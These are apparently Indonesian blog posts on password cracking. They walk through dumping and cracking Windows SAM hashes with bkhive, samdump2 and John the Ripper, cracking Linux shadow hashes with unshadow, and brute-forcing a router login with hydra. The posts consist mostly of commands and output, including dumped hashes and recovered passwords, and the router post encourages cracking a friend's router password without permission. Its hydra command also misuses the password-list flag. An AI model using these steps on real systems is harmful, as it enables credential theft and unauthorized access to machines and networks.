Showing posts with label Cracking. Show all posts
Showing posts with label Cracking. Show all posts

Saturday, March 3, 2012

Cracking Password Windows

Sistem operasi windows menyimpan file passwordnya pada /WINDOWS/system32/config/SAM yang enkripsi sehingga cracker tidak bisa membaca isi filenya, akan tetapi faktanya adalah sia-sia karena proteksi ini berhasil ditembus. Sehingga Microsoft menambahkan satu tahap proteksi untuk melakukan pengacakan pada file SAM semenjak sistem operasi NT SP 3 yang dinamakan syskey (SYStem KEY) yang baru dipakai pada Windows XP dan 2003.
Sehingga kegiatan Cracking Menjadi sulit karena harus mendapatkan nilai syskey sebelumnya untuk melakukan cracking pada password Windows. Disini kita kan manggunakan bkhive untuk untuk mendapatkan syskey dan Samdump untuk mendapatkan hash dari file SAM. Terakhir file hash kita akan crack menggunakan John The Ripper.

1. Booting DVD Backtrack dan mount drive C pada windows

root@root:~# fdisk -l

Disk /dev/sda: 10.7 GB, 10737418240 bytes
255 heads, 63 sectors/track, 1305 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0xf9c9f9c9

   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *           1        1304    10474348+   7  HPFS/NTFS
root@root:~# mkdir /mnt/sda1
root@root:~# mount -t ntfs /dev/sda1 /mnt/sda1 -o force

2. Ambil key dari system menggunakan bkhive simpan menjadi key.txt

root@root:~# cd /mnt/sda1/WINDOWS/system32/config/
root@root:/mnt/sda1/WINDOWS/system32/config# bkhive system ~/Desktop/key.txt
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : $$$PROTO.HIV
Default ControlSet: 001
Bootkey: e5ff38114c42c939dd424d743c2449de



3. Gunakan samdump2 untuk mendapatkan hash dari file SAM dan key.txt simpan menjadi hash.txt

root@root:/mnt/sda1/WINDOWS/system32/config# samdump2 SAM ~/Desktop/key.txt > ~/Desktop/hash.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : SAM
root@root:/mnt/sda1/WINDOWS/system32/config# cat ~/Desktop/hash.txt 
Administrator:500:ad14d8a198d59425aad3b435b51404ee:3b8c3f78f6234c65f1546c64d2f60c02:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:c777e627a172ac2746aa5c01317bb49b:c89f1c86ea7236bf367851f3c58797be:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c5b7293e8c3265d42977595b48810830:::
octopurba:1003:a17aad0ec01bbbe934a157cfdb7ad51f:b5034028f7b2ae3cf9e93b1181a39f2e:::



4. Crack file dari hash.txt menggunakan John The Ripper

root@root:/mnt/sda1/WINDOWS/system32/config# cd /pentest/passwords/john/
root@root:/pentest/passwords/john# ./john ~/Desktop/hash.txt 
Loaded 7 password hashes with no different salts (LM DES [128/128 BS SSE2])
GILAKOM          (octopurba:1)
                          (SUPPORT_388945a0)
                          (Guest)
PUTER              (octopurba:2)



diatas kita bisa melihat bahwa password adalah "gilakomputer" untuk user "octopurba".

Cracking Password Linux

Kebetulan kemarin pada workshop dikampus saya membahas tentang cracking password baik windows dan Linux disini saya akan membagikan cara cracking password untuk sistem operasi Linux dengan cara menggabungkan file /etc/passwd dan /etc/shadow menggunakan unshadow dari John The Ripper, langsung saja kita crack password linux kita.

1. Gabungkan /etc/passwd dan /etf/shadow simpan pada fileunshadow.txt

root@bt:~# cd /pentest/passwords/john/
root@bt:/pentest/passwords/john# ./unshadow /etc/passwd /etc/shadow > /root/Desktop/fileunshadow.txt

2. Crack password dari file unshadow yang kita dapat

root@bt:/pentest/passwords/john# ./john /root/Desktop/fileunshadow.txt 
Loaded 1 password hash (generic crypt(3) [?/32])
gilakomputer.net (root)
guesses: 1  time: 0:00:00:23 DONE (Sun Mar  4 09:48:57 2012)  c/s: 39.50  trying: 123456 - pamela
Use the "--show" option to display all of the cracked passwords reliably
root@bt:/pentest/passwords/john# ./john -show /root/Desktop/fileunshadow.txt 
root:gilakomputer.net:0:0:root:/root:/bin/bash

1 password hash cracked, 0 left 


Kita berhasil melakukan cracking pada user "root" dan password "gilakomputer.net".
Daftar password untuk John The Ripper dibacktrack tersimpan /pentest/passwords/john/password.lst.

Wednesday, February 15, 2012

Crack Password Router

Jika suatu saat sahabat lupa pada password router, mungkin karena terlalu banyak password yang harus dihapal atau bisa juga karena faktor "U" (Umur). Cracking Password router bisa menjadi salah satu pilihan yang pas ketimbang harus mereset ulang router tersebut, dan siapa tau juga nanti lagi internetan pake router temen iseng pengen tau apa sih password routernya. Disini saya menggunakan hydra sebuah aplikasi yang memang dikhususkan untuk melakukan cracking password, dan untuk router saya menggunakan TP-LINK TL-WR340G.

hydra -l admin -p LIST_PASSWORD -e ns -t 10 -f -s -vV IP_ROUTER http-get /

root@gilakomputer:~# hydra -l admin -p /pentest/passwords/wordlists/darkc0de.lst -e ns -t 10 -f -s -vV 192.168.0.1 http-get /
root@gilakomputer:~# firefox http://admin:admin@192.168.0.1

 
biz.